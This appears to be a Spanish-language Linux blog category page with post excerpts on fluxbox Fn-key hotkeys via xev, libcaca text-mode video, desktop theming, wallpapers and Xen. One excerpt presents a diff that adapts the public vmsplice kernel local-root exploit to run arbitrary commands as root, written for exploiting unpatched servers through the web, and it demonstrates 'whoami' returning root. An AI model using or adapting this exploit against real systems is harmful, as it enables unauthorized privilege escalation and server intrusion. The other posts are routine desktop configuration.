CategoríaGNU/Linux

Temas Referente a Linux

Configurar tecla Function (Fn) de los laptop en fluxbox

Tengo un notebook Compaq Presario C708LA con las tipicas teclas con segundas funciones que se activan mediante la tecla [Fn] y se me ocurrio un dia configurarlas, en fluxbox.
En este caso ayudare a configurar las teclas para subir y bajar el volumen, play, stop, ff, rewind y bloquear la pantalla.

Lo haremos definiendo hotkeys. Primero debemos reconocer el numero (KeyCode) de la tecla que queremos definir o configurar, esto lo hacemos ejecutando xev, nos abrira una ventana rara donde solamente debemos presionar la tecla, podemos darnos cuenta que si presionamos la tecla que tiene el icono para subir o bajar el volumen sin presionar Fn nos marcara un codigo y si la presionamos con Fn marcara otro codigo, entendemos entonces que son distintas teclas o distintos KeyCodes. xev nos mostrara una salida asi:

KeyPress event, serial 34, synthetic NO, window 0x2200001,
root 0x69, subw 0x0, time 22118506, (485,592), root:(666,646),
state 0x0, keycode 9 (keysym 0xff1b, Escape), same_screen YES,
XLookupString gives 1 bytes: (1b) ”
XmbLookupString gives 1 bytes: (1b) ”
XFilterEvent returns: False

A nosotros solamente nos interesa lo que esta en negritas. Lo primero es el numero de tecla y lo segundo marcado es el nombre (o alias) de la tecla, si no nos aparece lo segundo nos guiamos por lo primero resaltado.
Por ejemplo, a continuacion les mostrare lo que muestra xev cuando presiono la tecla para bajar el volumen con y sin Fn:

Con Fn

KeyRelease event, serial 34, synthetic NO, window 0x2200001,
root 0x69, subw 0x0, time 22273462, (550,501), root:(749,573),
state 0x0, keycode 174 (keysym 0x0, NoSymbol), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: False

Sin Fn

KeyPress event, serial 34, synthetic NO, window 0x2200001,
root 0x69, subw 0x0, time 22269330, (550,501), root:(749,573),
state 0x0, keycode 105 (keysym 0xff56, Next), same_screen YES,
XLookupString gives 0 bytes:
XmbLookupString gives 0 bytes:
XFilterEvent returns: False

El KeyCode cambia de 174 a 105.

Seguir leyendo

libcaca: Viendo videos en modo texto

libcaca is a graphics library that outputs text instead of pixels, so that it can work on older video cards or text terminals.

Esta libreria nos permite cambiar los pixeles por caracteres ascii lo que nos permite ver videos en modo texto en maquinas antiguas.

Usando mplayer con libcaca

mplayer -vo caca video_example.ogg

httpvh://www.youtube.com/watch?v=8hY-dCz03gs

Links
caca labs

root exploit: Ejecutar comando como root

Hace un tiempo se dio a conocer un bug que afectaba a las versiones 2.6.17 – 2.6.24.1 del Kernel de Linux. Se publicaron distintas variantes del exploit que nos permitia escalar privilegios y ganar acceso root a una maquina con solo ejecutar el exploit.
Tuve la idea de modificar uno de estos codigos publicados para poder explotar la vulnerabilidad a traves de la web. Esto se me ocurrio debido a la experiencia en intrusion en servidores, sabiendo que muchos usan versiones de kernel antiguos o que no estan parcheadas.

root-exploit.diff

  1. 51a52
  2. > char  *_cmd;
  3. 55d55
  4. < printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  5. 182,183d181
  6. <
  7. <       printf("[+] root\n");
  8. 185c183,184
  9. <       execl("/bin/bash", "bash", "-i", NULL);
  10. >       system(_cmd);
  11. >       //execl("/bin/bash", "bash", "-i", NULL);
  12. 195a195
  13. >       _cmd = argv[1];
  14. 202,205d201
  15. < printf("———————————–\n");
  16. <       printf(" Linux vmsplice Local Root Exploit\n");
  17. <       printf(" By qaaz\n");
  18. <       printf("———————————–\n");
  19. 221,223d216
  20. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  21. <       printf("[+] page: 0x%lx\n", pages[0]);
  22. <       printf("[+] page: 0x%lx\n", pages[1]);
  23. 241,243d233
  24. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  25. <       printf("[+] page: 0x%lx\n", pages[2]);
  26. <       printf("[+] page: 0x%lx\n", pages[3]);
  27. 258,259d247
  28. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  29. <       printf("[+] page: 0x%lx\n", pages[4]);
  30. 269d256
  31. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size)

La modificacion que hago es eliminar todos los printf para que el resultado sea mas limpio ademas, tambien modifico el codigo para que ejecute el comando que nosotros le digamos y luego vuelva a su estado normal.

Demostracion

username@machine:~$ ./root-exploit whoami
root
username@machine:~$

Seguir leyendo

Configurando fluxbox

Por fin me di el trabajo de enchular un poco la apariencia fisica de fluxbox en mi laptop.

Screenshot:

fluxbox new look fluxbox new loook!

 

Software:

  • Entorno grafico: Fluxbox 1.1.1
  • Barra de iconos: wbar
  • Reproductor multimedia: mplayer
  • Barra lateral derecha: GKrellm
  • Navegador: Firefox (Gran Paradiso)
  • Cliente IM: emesene
  • Terminal: urxvt (rxvt unicode)
  • Sistema operativo: Archlinux

Como lograr la transparencia
La transparencia del menu, taskbar y titlebar se propia de fluxbox y se puede configurar haciendo clic derecho, Configuracion -> Transparecnias. La transparencia de GKRellm es un theme que se llama invisible.
Las ventanas transparentes se logran gracias a transset (hay que tener activado Composite en la configuracion de Xorg, salvo las tarjetas intel que viene incormorado en el modulo intel).

Sombras y efectos
Las sombras y los efectos tipo fade-out/in se logran usando xcompmgr.

Si te gusto el estilo que estoy usando y como lo tengo configurado, entocnes debes seguir leyendo.

Seguir leyendo

Wallpapers

He recolectado algunos wallpapers para compartir con ustedes, espero que les gusten:

3dhuman007.jpg 3dhuman009.jpg abstrac034.jpg

 

abstrac038.jpg abstrac042.jpg

ie_vs_ff.jpg

 

 

ciber-debian.jpg debian038.jpg
debian045.jpg debian_powerful_and_safe.png

debian1600.png debian_moment.jpg
debian_simpler_is_better.jpg debian064.jpg

opensuse01.jpg opensuse02.jpg

linux010.jpg crosscode.jpg
tux004.jpg tux01.jpg

Pueden encontrar más wallpapers buscando allintitle: “Index of /wallpapers” en nuestro amigo Google.

Virtualizacion usando Xen

Hasta hace unos dias solo habia probado la Virtualizacion usando vmware pero hace unos dias me puse a trabajar e investigar sobre Xen y hay varias cosas que me llamaron la atencion, su modo de trabajar, los conceptos que emplea, la facilidad y versatilidad, etc.

Seguir leyendo